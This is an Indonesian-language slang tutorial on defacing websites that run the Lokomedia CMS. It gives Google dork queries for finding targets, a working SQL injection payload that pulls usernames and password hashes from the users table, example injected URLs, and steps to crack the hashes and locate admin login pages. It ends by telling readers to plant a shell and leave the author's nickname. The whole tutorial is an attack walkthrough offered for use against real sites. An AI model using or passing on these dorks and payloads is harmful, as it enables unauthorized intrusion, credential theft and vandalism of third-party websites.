Cara Deface Poc Sql Lokomedia
Kali ini gua akan ngasih tau cara deface POC SQL LOKOMEDIA
Bahannya coeg:
-Dork
-Shell (di mbah kyta banyak jangan males tod)
-Exploit
-MD5 Decrypter
-Sabun buat coli :v
-Kopi
-Pastinya Internet ea akmj
Pertama, masukin dorknya dulu ea akmj
Dork:
inurl: hal-tentang-kami.html
inurl: hal-profil-kami.html
inurl: hal-visi-dan-misi.html
inurl: statis-1/profil.html
inurl:statis-2/visi-dan-misi.html
inurl:kategori-23-hiburan.html
inurl:statis-1-pengantar.html
inurl:statis-1-pengantar.html
inurl:statis-19-beasiswa.html
inurl:statis-3-strukturorganisasi.html
inurl:kategori-40-
inurl:kategori-2-
inurl:semua-berita.html
inurl:semua-agenda.html
Kembangin dorknya ea akmj biar dapet yg fresh kaya bokep :v
Exploitnya jangan lupa coeg: 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+.html
Contoh 1: www.targetlu.co.li/hal-tentang-'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+kami.html
Contoh 2: www.targetlu.co.li/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
MD5 Decrypter : toolnya Klik Disini kalo ngga Disini
Oke cekidot ea langsung tutornya :
1. Masukin dorknya ke Mbah kita yaitu google.com kalo orang Indonesia bilangnya Gugel hwhw canda gan :v
2. Pilih salah satu target ea kimak, terserah mau satu target, dua target, bahkan sampe 100 target pun nggapapa :v
3. Masukin Exploitnya coeg, contohnya udah di kasih tau diatas
4. Kalo vuln di atas ada tulisan admin,(ada banyak nomor)
5. Tekan CTRL + U, terus Copy MD5 nya, contoh : admin, 875261727262 (angka ngasal :v) copy angkanya coeg lalu paste di MD5 decrypter
6. Kalo udah nemu password-nya sekarang tinggal nyari admin loginnya
Biasanya: http://target.co.li/adminweb
http://target.co.li/admin
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Cari sendiri ea akmj gua cape :v
8. Jangan lupa ea bawa Nick gua Mr.ReposadoCyber
